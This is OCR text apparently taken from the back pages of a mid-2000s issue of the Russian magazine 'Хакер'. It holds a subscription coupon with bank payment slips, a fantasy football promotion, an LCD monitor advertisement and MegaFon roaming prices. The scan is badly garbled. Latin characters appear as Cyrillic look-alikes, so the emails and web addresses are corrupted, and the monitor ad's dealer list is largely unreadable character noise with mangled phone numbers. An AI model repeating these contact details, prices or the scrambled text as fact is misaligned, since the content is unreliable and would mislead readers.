сложно. Хотя теоретически можно зарегист- 
рировать и дешевле, но стоит ли заморачи- 
ваться из-за пары баксов? =н= 
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1 Заполни купон и квитанцию - 

іі Перечисли стоимость подписки через Сбербанк 

і Обязательно пришли в редакцию копию оплаченной квитанции 
с четко заполненным купоном любым из перечисленных способов: 
по электронной почте: 5иЬбсгіЬе@дІс.ги; 
по факсу: 8-495-780-88-24; 

по адресу: 1 1 9021 , Москва, ул. Тимура Фрунзе, д. 1 1 , стр. 44-45 
4 Получи 300 бонусов от плподо.ш 
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А" 



Хакер" + 0Ѵ0 



990р за 6 МЕСЯЦЕВ 
1920р за 12 МЕСЯЦЕВ 



^Хакер" + „Хакер Спец ,ѵ 



1830р за 6 МЕСЯЦЕВ 
ЗбООр за 12 МЕСЯЦЕВ 



ВНИМАНИЕ! 

подписка оформляется в день обработки купона и квитанции. 

Купоны, отправленные по факсу или электронной почте, обрабатываются 
в течение 5 рабочих дней. Купоны, отправленные почтой 
на адрес редакции обрабатываются в течение 20 дней. 

Рекомендуем использовать электронную почту или факс. 



Подписка 

для юридических лиц 



Подписка производится с номера, выходящего через один календарный Москва: ООО «Интер-Почта», 

месяц после оплаты. Например, если произвести оплату в сентябре, то тел.: 500-00-60, ѵѵѵѵѵѵ.іпіегросіііа.ги 

подписку можено оформить с ноября. 



По всем вопросам, связанным с подпиской, звони по бесплатным телефонам: 
780-88-29 (для москвичей) и 

8-800-200-3-999 (для регионов и абонентов Билайн, МТС и МегаФон). 
Вопросы по подписке можно задавать по е-таіі: іп^о @ діс.ги 

А: 

в- 



Для получения счета на оплату подписки нужно при- 
слать заявку с названием журнала, периодом подпис- 
ки, банковскими реквизитами, юридическим и почто- 
вым адресом, телефоном и фамилией ответственного 
лица за подписку. 



ПОДПИСНОЙ КУПОН 

Прошу оформить подписку: 



I I на журнал Хакер + РѴй 

на комплект Хакер+ РѴО и Хакер Спец + Сй 



□ 



на | | месяцев 

начиная с 



200 г. 



|—| Доставлять журнал по почте 
1 — 1 на домашний адрес 
|—| Доставлять журнал курьером на 
* адрес офиса (по г. Москве) 

Подробнее о курьерской доставке читайте ниже* 



(отметьте квадрат выбранного варианта подписки) 

Ф.И.О. 



ПП. ПП. ППг. 

день месяц год 

АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

* Курьерская доставка осуществляется только по Москве 
на адрес офиса. Для оформления доставки курьером 
укажите адрес и название фирмы в подписном купоне. 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ЗАО ММБ 

р/с № 40702810700010298407 



к/с № 30101810300000000545 



БИК 044525545 




КПП -772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата за « 


» 


Сумма 


с 


200_ г. 





месяц 



Ф.И.О. 



Кассир 



Подпись плательщика 



Квитанция 



ИНН 7729410015 ООО «Гейм Лэнд» 

ЗАО ММБ 

р/с № 40702810700010298407 



к/с № 30101810300000000545 



БИК 044525545 




КПП -772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 




Сумма 


Оплата за « 


» 




с 


200_ г. 








Ф.И.О. 



Кассир 



Подпись плательщика 
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асІісІаз.сотЛооТЬаІІ 

ид 



"ФУТБОЛЬНЫЙ МЕНЕДЖЕР"! 

СОЗДАЙ СВОЮ КОМАНДУ ИЗ РЕАЛЬНЫХ ИГРОКОВ И ПРИВЕДИ ЕЕ К ПОБЕДЕ 



ТЫ ПОЛУЧАЕШЬ $135 МИЛЛИОНОВ 

на приобретение игроков российской премьер-лиги при 
регистрации на сайте \л/\л/\л/.іоіаІ-І : оо1-ЬаІІ.ги. 

Подробности на сайте мплплг.ІоІаІ-іооІЬаІІ.ги 



ГЛАВНЫЙ ПРИЗ - 
ПОЕЗДКА НА ФИНАЛ ЛИГИ 
ЧЕМПИОНОВ 2006/07 



I 















Во Вл 



ачества 



Яркое насыщенное изображение 

Жвдкохристаплический монитор 117506С'ЗЫ Ріаігоп 
Видимая область 17" (43,1 8 см) Дочка 0 264 к 0.264 мм 
Яркость 250 кд/м2 ■ типичная /Контрастность 500:1 - типичная 
Подсвети 4 лампы ССП /Угол обзора 1 60' по горизонтали, 1 60 е ло вертикали 
Время отклика 8 мс /Глубина цвета 16.2 млн. цветов 
Соответствие стандартам ТОО’ОЗ /Разрешение 1280x1 024@75 Гц 



Информационная служба Ш ЕІесіюоісз Ѳ -800 -200-76-76 (бесплатная горячая линия т Рйсш) ѵлѵчѵ.іу.ги 




^'©іпаѴісіогіа 

[ОЭ5] «64-61-17, 6М-27-ЕЁ 



ѵиѵт.рѵсомш 



Мигни Ріопаі&імѵ^ТЮЭВ *' Мос.к Нмѵр |4*5| 23 ?3 23 Мйда р» и-п. Р*™ (№} 755 И 5? Мг>м» 'I П-тр |40йц7? -4 п I 

МоСіЮ ИТ СфИірЛп ]495| Ш !9 30, Третссипя |4«| 777 «7 П.Мо<жп.і м.ііглі.ч Кні >4«.| 777 № 55. ІЛійхіы Гики |495) ЯЖ 99 25 »да 

№ груі« (495(745 5175. Меда Сілгалч Мщиюрпн 1495) Т94 г4 №. Мшсі І»|| (495) 7і$ ІИ 2». Меда Ник (485(974 33 33, Мп№ 9ЦДО 
Г 486] 105 47 «. Мгн:.;ѵ, 05Н СЯДО* 1495) 2?1 72 9Т Моим Сіурі Маг:пр (4Я}| №5 38 5?,М№1 Ліргіп Г4Я5І 7В4 72 ?4. ШкіМ З'ив*»# 
(4П5і 5ГЙ (Ю 00, Моим; КЙЬрПхвд И95) № 25 31 .Мш-лвд Диплим |495} «8 22 22.№да Ш.Щ СопчдЛт (405) 775 75 №. 729 52 55. Гкл' 
ДО |4а5|2ЭС1-55 Зг.ГѴсіім Гошм- ІЗД^Ж 37 7з. [Зпяш-рв Оімінгаііірі^ішгаііш^ВД?! «I ПЛ № Мітаіп, АЛыф |4в§( 101 39 25. Мел*» 
Мгічтостг (4951924 27 47. №ѵіч Гітгріичигг Оцстц Про ;495| 54? $П 79. С**і Пгтпріт.фг ДОМ Ча» (81 21 325 1 1 05. 7м™ч»ргі*іп Л#»Щ 
(Э4№1 М й 77. Красіадкі Им**д Крюівдр ІВСІІ 2561 552. 2519 915. Н*си!нір:і Іяш 133323)352 4Л7. ИіжяиЬцп' %жш™(Э9Э) 221 15 ®і, 
ЕЫг ѵгая Тгаи. \ІІ*2\ 97 » Э7,НШмй НЖцэд АЙТИ* (8312) 74 05 аЯДчикм, ИНжС Тйи**а (3*52139 № Ж 3™ гросг дп»,: Дючгшинщ (25 П 
гі4№.Нр^Кі: КВД (3952) 2$9338,|ИЬ*ут(і : Бшілйіі (39К| 74-00 Ій.КѴХХгЧЯш; АНЛИЭВ 12(21 II 45.№«л РпарДТцз 10742; 49 45 73. ЦДОжі 
С*ы |07Э2( 54 «НЮ Г Вдаігя Рет 1.0732(77 93 39. Теша Цірі (3922) 55 7 1 «, Рам, ДЕК (99121 90 № 00. ГМЗД: Хоипліікр Нприг 
(П2321 48 N1 4ё.Тцм'»ь Т(цгавгі0Ш4«ш> (3452 1 75 № СО. ОреНіур Те*™* Т(йр«іш(Э53?|53е 5Й5. СЫз Т^ЛЧВіа (3913)57 93 ІЧДиіл! Нетп 
1-л, иі:і,м г|нм#И ыир |8553) 25 9* 48. Поремъ РИАЛ (47321512 4 1? ЛпГзынигин КЦ йил(34992[51 777. Мягка ЭЛМИ(Э4 1 2) ЯІ 50 № (Цп- Ля 2ВД 
(3852)2297® 

Я»ч-і Виктория' с<(і^:ідалі»н(,чТ г)іктпр\Фі,хѵя$р ѵонмвдда чс*иплмци іо гГвС^егііМ ИЯ тѵовіі/тю рии РФ 




ма пра#аг рсклшы 





международный % 



Роуминг ' 

за границей все понятно 

Путешествуйте! Теперь Вы точно знаете, сколько платите за связь - в роуминге от МегаФон цена 
минуты фиксированная внутри каждой из 4 тарифных зон. И к тому же в рублях. 

Все просто и понятно! 



1 Тарифная зона 


Звонок в Россию 


Входящие звонки 


Исходящее 5М5 


Соседние с Россией страны: 
Украина, Белоруссия, Казахстан, 
Грузия, Финляндия, Польша и др. 


43 руб. 


37 руб. 




Европа: 

Италия, Испания, Франция, Турция, 
Греция, Кипр, Хорватия и др. 


69 руб. 


45 руб. 


15 руб. 


Америка: 

США, Канада, Мексика и др. 


125 руб. 


80 руб. 


Остальные страны: 

ОАЭ, Египет, Китай, Япония, Индия, 
Индонезия, Куба и др. 


100 руб. 


80 руб. 





Цена указана с учетом НДС. 




Подробности - на сайте ѵѵѵѵѵѵ.тезаіЪп.ги 

Лицерия №№ 10010, І3282, 14404, 15002, 
ш 15499, 15410, 15411, 15^12, 16338, 20377 і 
Министерства РФ по связи и информатизаций'. 
Натравах рекламы. 





МегаФон 

Будущее зависит от тебя 
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